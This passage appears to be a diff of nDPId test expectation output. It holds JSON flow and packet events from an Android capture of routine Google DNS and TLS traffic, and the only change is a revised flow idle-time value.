-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454868844,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868844,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0PHBAAEAGfL\/AqAIQrNkSA5AYAbuCdQgtxrmESoAQAVcxKAAAAQEICv\/\/NJZRt9Th"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868511,"flow_last_seen":1582454868936,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868936,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454868843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868843,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8fo0AAHYGRJqs2RIDwKgCEAG7kBjGuYRJgnUILaAS6yAZNAAAAgQFZAQCCApRt9Th\/\/80QwEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454868844,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868844,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0PHBAAEAGfL\/AqAIQrNkSA5AYAbuCdQgtxrmESoAQAVcxKAAAAQEICv\/\/NJZRt9Th"} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868511,"flow_last_seen":1582454868936,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868936,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1582454869361,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1582454869361,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA+qnVAAEARCtjAqAIQwKgCAZhgADUAKv996DEBAAABAAAAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAQ=="} 00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1582454869363,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1582454869363,"pkt":"TGr2n\/YnxiwDYGpkCABFAABORPIAAEARsEvAqAIBwKgCEAA1mGAAOr6H6DGBgAABAAEAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454869363,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869517,"flow_last_seen":1582454869517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869517,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1582454869517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869517,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ooxAAEAGf8\/AqAIQrNmozsTQAbv86pehAAAAAKAC\/\/+fWQAAAgQFtAQCCAr\/\/zUtAAAAAAEDAwg="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1582454869556,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869556,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA80VwAAHUGW\/+s2ajOwKgCEAG7xNCPRbjJ\/OqXoqAS6yAGLQAAAgQFZAQCCApmsf+J\/\/81LQEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1582454869557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454869557,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oo1AAEAGf9bAqAIQrNmozsTQAbv86peij0W4yoAQAVceWQAAAQEICv\/\/NUhmsf+J"} -00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454869517,"flow_last_seen":1582454869614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454869614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869626,"flow_last_seen":1582454869626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869626,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1582454869626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869626,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2ZAAEAG9TXAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9vQQAAAgQFtAQCCAr\/\/zVZAAAAAAEDAwg="} -00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":176,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","server_names":"*.google-analytics.com,*.fps.goog,app-measurement.com,fps.goog,google-analytics.com,googleoptimize.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googleoptimize.com,www.googletagmanager.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google-analytics.com","alpn":"http\/1.1","fingerprint":"B0:D9:D3:57:C2:34:87:2C:FB:F5:E6:BD:7F:9F:54:65:08:61:AF:01"}} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454870649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454870649,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2dAAEAG9TTAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9uQgAAAgQFtAQCCAr\/\/zZYAAAAAAEDAwg="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869517,"flow_last_seen":1582454869517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869517,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1582454869517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869517,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ooxAAEAGf8\/AqAIQrNmozsTQAbv86pehAAAAAKAC\/\/+fWQAAAgQFtAQCCAr\/\/zUtAAAAAAEDAwg="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1582454869556,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869556,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA80VwAAHUGW\/+s2ajOwKgCEAG7xNCPRbjJ\/OqXoqAS6yAGLQAAAgQFZAQCCApmsf+J\/\/81LQEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1582454869557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454869557,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oo1AAEAGf9bAqAIQrNmozsTQAbv86peij0W4yoAQAVceWQAAAQEICv\/\/NUhmsf+J"} +00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454869517,"flow_last_seen":1582454869614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454869614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869626,"flow_last_seen":1582454869626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869626,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1582454869626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869626,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2ZAAEAG9TXAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9vQQAAAgQFtAQCCAr\/\/zVZAAAAAAEDAwg="} +00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":176,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","server_names":"*.google-analytics.com,*.fps.goog,app-measurement.com,fps.goog,google-analytics.com,googleoptimize.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googleoptimize.com,www.googletagmanager.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google-analytics.com","alpn":"http\/1.1","fingerprint":"B0:D9:D3:57:C2:34:87:2C:FB:F5:E6:BD:7F:9F:54:65:08:61:AF:01"}} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454870649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454870649,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2dAAEAG9TTAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9uQgAAAgQFtAQCCAr\/\/zZYAAAAAAEDAwg="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1582454870996,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454870996,"pkt":"xiwDYGpkTGr2n\/YnCABFAABIq6dAAEARCZzAqAIQwKgCAY8FADUANFCq5z4BAAABAAAAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAE="} 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1582454870998,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1582454870998,"pkt":"TGr2n\/YnxiwDYGpkCABFAABYgb0AAEARc3bAqAIBwKgCEAA1jwUARA+05z6BgAABAAEAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454870998,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871042,"flow_last_seen":1582454871042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871042,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1582454871042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871042,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA83wxAAEAGmY\/AqAIQ2O8meIDaAbu5DOmwAAAAAKAC\/\/8p0AAAAgQFtAQCCAr\/\/za8AAAAAAEDAwg="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871042,"flow_last_seen":1582454871042,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871042,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1582454871042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871042,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA83wxAAEAGmY\/AqAIQ2O8meIDaAbu5DOmwAAAAAKAC\/\/8p0AAAAgQFtAQCCAr\/\/za8AAAAAAEDAwg="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 